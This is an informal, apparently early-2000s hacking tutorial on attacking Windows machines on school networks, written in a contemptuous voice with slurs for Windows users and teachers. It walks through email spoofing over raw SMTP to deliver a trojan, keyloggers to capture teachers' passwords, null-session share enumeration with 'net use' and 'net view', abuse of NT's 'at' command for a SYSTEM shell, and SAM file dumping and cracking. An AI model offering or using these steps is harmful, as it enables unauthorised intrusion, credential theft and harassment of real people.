Training session 12: Windows Hacking
Learn how pathetic Microsoft security really is
What is the use of hacking a winblows box? Nothing important is ever kept on them, web servers with decent information rarely run windows, they rather prefer the stability, security and cost effectiveness of the more superior Linux or BSD. Windows users are normally just average people, with nothing more than a modem, a few bought games, and a hotmail account. Script Kiddies seem to think that hacking that hot girl down the street's computer will provide you with some mystical insight of what she wants in a guy, or maybe even in some unkown way, get them laid. This is totally wrong, very rarely do girls ever keep their diary on their computer, very rarely does their hotmail account contain something more than a few emails from relatives, and extremely rarely does it get you anything useful.
So I ask again, now you have been somewhat enlightened, what is the use of hacking a winblows box? Nearly every decent hacker out there can probably recall the days when they were in school, not knowing, or not having access to anything but windows, and possibly if they were lucky os/2, out of boredom, they took to hacking the school network. Hacking windows box's gives a basic insight into what security is, basic methods on how to defeat it, setting up keylogger's and sniffers, playing pranks on teachers, and maybe even stealing a few internet accounts along the line.
Anyway, now that i have hopefully enlightened you a little to how useless hacking windows box's really is, and that they are only useful to learn to hack due to the large quantities of people who use it, those peoples stupidity, and therefore a large ammount of possible targets.
First thing, people who run windows by choice are stupid. Those that run dual boot systems between Linux and winblows can be excused, but for the vast majority of society this is true. So what if these people are stupid? Why does this help us in hacking their pathetic box? Well to put it rather simply, they can be social engineered with little or no effort. This means for example we could trick a teacher into giving us the school administrator password, and along with that a higher grade.
A simple act of faking an email, placing an attachment containing a custom coded trojan that will enable sharing of a particular drive, and the target is gone. Faking email is very simple, all it takes is a bit of creativity and a few minutes of time, the following is an example email that would get that retard from maths class back for pissing you off:
telnet mail.school.com 25
mail from: firstname.lastname@example.org
rcpt to: email@example.com
You are a lying piece of retarded crap, you dickhead of a principal!
Ok, mail.school.com obviously has to be replaced with your school mail server address, firstname.lastname@example.org has to be replaced with the target for payback, and email@example.com has to be replaced with the principal's email address. Although this has accomplished nothing but getting the student suspended from school for a week or so, it shows us how simple it would be for us to trick our target into believing a malicious program we have crafted was sent by the targets beloved grandma.
Keyloggers can come in handy in many cases, they simply record every key that is pressed, the teacher types his/her password, it saves it to a file, you come and pick up the bounty. Annoyingly this can be alot harder than this on either NT or 2000, so other approaches have to be taken.
Many 95/98/ME users have file and print sharing active, a mere password is all that stands between you, and a nicely placed trojan on the targets computer. To check whether the target has file and print sharing active, go into explorer, and type \\ip.of.target into the address bar, where 'ip.of.target' is obviously the targets ip. If you dont recieve an error, the victim is as stupid as we first believed. If none of the drives have passwords we are lucky, if they do then all that is required is using xIntruder to exploit a hole in netbios that allows us to crack any active password within a few minutes. If the target has NT, 2000 or XP you are out of luck, these take ages to crack in most cases. Although some useful information can be obtained from these box's thru netbios. To find out what shares are active simply type the following in dos:
net use \\ip.of.target\ipc$ "" /user:""
net view \\ip.of.target
In most cases this will show you a full list of all the shares, apart from the hidden ones. Under NT/2000/XP there are default shares, they are shown with a $ , just like $IPC but they correspond to drive letters, for example c$ corresponds to C Drive, but only users with administrator privledges may access them. Sometimes you may even have full access to the server with this method depending on the lameness of the administrator.
Lets introduce a nice little hole in NT called 'at'. This program was obviously created by complete morons, and if you have access to it, your system administrator is about as intelligent as two tin cans and a rubber band. To test for it, go into dos, and type 'at' if you get a access denied you are out of luck, but if you dont, you have now gained 'SYSTEM' which in terms of access, is higher than even administrator. Play with this program, make it execute 'cmd' to spawn a 'SYSTEM' shell, execute regedt32 and change registery permissions, or basically do anything you wish. This is really only the local box, it hasnt got you the administrator password, to get that use a program called samdump or something similar to get a copy of the sam file. This file contains all the user passwords on the system. It can normally only be accessed by users who are atleast administrator, but as system, you dont have to worry. Take the sam file home and crack it with either our good friend John the Ripper, or l0pht.
These are just some basic idea's on how to hack a winblows box. There are many more methods, way too much to list them all, but hopefully this list will encourage some creativity, and inspire you to do some research. Windows really isnt as secure as Microsoft wish's us to believe.